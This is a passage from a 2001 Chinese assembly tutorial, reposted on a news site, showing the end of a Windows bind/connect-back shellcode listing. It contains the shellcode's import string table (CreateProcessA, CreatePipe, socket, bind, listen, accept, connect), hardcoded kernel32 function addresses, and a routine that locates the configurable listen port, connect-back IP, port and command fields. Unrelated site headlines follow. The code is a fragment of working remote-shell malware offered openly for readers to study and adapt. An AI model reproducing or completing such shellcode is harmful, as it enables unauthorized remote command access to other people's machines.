db '++++++++++++++++'

db '++++++++++++++++'

db '++++++++++++++++'

;//下面是函数信息.

SHELL_NEED_FUNC_BODY_OFFSET equ $-szShellNeedFunc;//这个是shell函数和dll的偏移

db 02h

db 0eh, 'kernel32.dll+', '+'

db 0eh

db 11h, 'TerminateProcess', '+'

db 0bh, 'CreatePipe', '+'

db 10h, 'GetStartupInfoA', '+'

db 0fh, 'CreateProcessA', '+'

db 0eh, 'PeekNamedPipe', '+'

db 0ch, 'GlobalAlloc', '+'

db 0bh, 'WriteFile', '++'

db 09h, 'ReadFile', '+'

db 06h, 'Sleep', '+'

db 0ch, 'ExitProcess', '+'

db 0eh, 'GetLastError+', '+'

db 10h, 'DuplicateHandle', '+'

db 12h, 'GetCurrentProcess', '+'

db 0ch, 'CloseHandle','+'

db 0bh, 'ws2_32.dll', '+'

db 0bh

db 07h, 'socket', '+'

db 05h, 'bind', '+'

db 07h, 'listen', '+'

db 07h, 'accept', '+'

db 05h, 'send', '+'

db 05h, 'recv', '+'

db 0bh, 'setsockopt', '+'

db 0bh, 'WSAStartup', '+'

db 0ch, 'closesocket', '+'

db 08h, 'connect', '+'

db 0ch, 'gethostname', '+'

db '+++++++++++++++++++++'

_GetModuleHandle_Addr_Offset equ $-szShellNeedFunc

GetModuleHandleOffset equ $-start;

GetModuleHandleA_Addr dd 77e756dbh

GetProcAddressOffset equ $-start;

GetProcAddressA_Addr dd 77e7564bh

_size_szShellNeedFunc equ $-szShellNeedFunc+1

_size_AllData equ $-MyConnectInfo+1

_sk_Bind_ConnectShellCode endp

db '---------------------------------------------------------'

;//重要数据在代码中的偏移

stDataSetOffset struct

dwConnectType DD 0;

dwListenPort DD 0;

dwConnectIP1 DD 0;

dwConnectIP2 DD 0;

dwConnectPort DD 0;

dwExecCommand DD 0;

wSizeExecCommand DW 0;

wReserv1 DW 0

dwGetModuleHandle DD 0;

dwGetProcAddress DD 0;

stDataSetOffset ends

_GetDataSetOffset_Value proc

push ebp;

mov ebp, esp;

push esi;

push edi;

push edx;

push ecx;

push ebx;

push eax;

mov esi, FUNC_PARAM_1;

lea edi, [esi+stDataSetOffset.dwConnectType];

mov eax, ConnectTypeOffset;

mov [edi], eax;

lea edi, [esi+stDataSetOffset.dwListenPort];

mov eax, ListenPortOffset;

mov [edi], eax;

lea edi, [esi+stDataSetOffset.dwConnectIP1];

mov eax, ConnectIP1Offset;

mov [edi], eax;

lea edi, [esi+stDataSetOffset.dwConnectIP2];

mov eax, ConnectIP2Offset;

mov [edi], eax;

lea edi, [esi+stDataSetOffset.dwConnectPort];

mov eax, ConnectPortOffset;

mov [edi], eax;

lea edi, [esi+stDataSetOffset.dwExecCommand];

mov eax, ExecCommandOffset;

mov [edi], eax;

lea edi, [esi+stDataSetOffset.wSizeExecCommand];

mov ax, SHELL_NEED_FUNC_BODY_OFFSET;

mov [edi], eax;

lea edi, [esi+stDataSetOffset.dwGetModuleHandle];

mov eax, GetModuleHandleOffset;

mov [edi], eax;

lea edi, [esi+stDataSetOffset.dwGetProcAddress];

mov eax, GetProcAddressOffset;

mov [edi], eax;

pop eax;

pop ebx;

pop ecx;

pop edx;

pop edi;

pop esi;

mov esp, ebp;

pop ebp;

ret;

_GetDataSetOffset_Value endp

end

----完----

读者如果是看不明白程序的流程,或者有关程序的地方,请自己多多摸索。

by snake. 2001/7/31

 
 
 
免责声明:本文为网络用户发布,其观点仅代表作者个人观点,与本站无关,本站仅提供信息存储服务。文中陈述内容未经本站证实,其真实性、完整性、及时性本站不作任何保证或承诺,请读者仅作参考,并请自行核实相关内容。
2023年上半年GDP全球前十五强
 百态   2023-10-24
美众议院议长启动对拜登的弹劾调查
 百态   2023-09-13
上海、济南、武汉等多地出现不明坠落物
 探索   2023-09-06
印度或要将国名改为“巴拉特”
 百态   2023-09-06
男子为女友送行,买票不登机被捕
 百态   2023-08-20
手机地震预警功能怎么开?
 干货   2023-08-06
女子4年卖2套房花700多万做美容:不但没变美脸,面部还出现变形
 百态   2023-08-04
住户一楼被水淹 还冲来8头猪
 百态   2023-07-31
女子体内爬出大量瓜子状活虫
 百态   2023-07-25
地球连续35年收到神秘规律性信号,网友:不要回答!
 探索   2023-07-21
全球镓价格本周大涨27%
 探索   2023-07-09
钱都流向了那些不缺钱的人,苦都留给了能吃苦的人
 探索   2023-07-02
倩女手游刀客魅者强控制(强混乱强眩晕强睡眠)和对应控制抗性的关系
 百态   2020-08-20
美国5月9日最新疫情:美国确诊人数突破131万
 百态   2020-05-09
荷兰政府宣布将集体辞职
 干货   2020-04-30
倩女幽魂手游师徒任务情义春秋猜成语答案逍遥观:鹏程万里
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案神机营:射石饮羽
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案昆仑山:拔刀相助
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案天工阁:鬼斧神工
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案丝路古道:单枪匹马
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:与虎谋皮
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:李代桃僵
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案镇郊荒野:指鹿为马
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案金陵:小鸟依人
 干货   2019-11-12
倩女幽魂手游师徒任务情义春秋猜成语答案金陵:千金买邻
 干货   2019-11-12
 
推荐阅读
 
 
 
>>返回首頁<<
 
靜靜地坐在廢墟上,四周的荒凉一望無際,忽然覺得,淒涼也很美
© 2005- 王朝網路 版權所有